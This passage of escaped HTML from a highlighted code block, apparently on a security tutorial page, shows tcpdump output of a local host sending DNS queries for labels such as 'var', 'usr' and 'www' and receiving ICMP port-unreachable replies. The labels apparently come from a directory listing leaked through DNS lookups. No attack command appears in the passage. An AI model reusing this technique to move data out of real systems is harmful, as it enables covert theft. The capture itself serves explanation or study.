class=\"crayon-cn\">44.958351<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-12\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.958837<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.36077<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-13\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.958857<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-14\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.965678<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.49884<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-15\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.965704<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-16\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.969792<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.53144<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-17\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.969820<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-18\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span 
class=\"crayon-cn\">44.970305<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.32949<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-19\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.970326<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-20\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.970971<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.48094<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-21\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.970993<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-22\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.971505<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.52246<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-23\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.971516<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-24\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.972015<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.41323<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-25\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.972036<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-26\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.974624<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.50795<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-27\"><span 
class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.974653<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-28\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975316<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.38359<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-29\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975337<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-30\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975827<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.55240<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span 
class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-31\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975848<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-32\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.976660<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.44499<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-33\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.976668<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-598a38e8ac96b002262104-34\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.979721<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.57446<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-35\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.979748<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span 
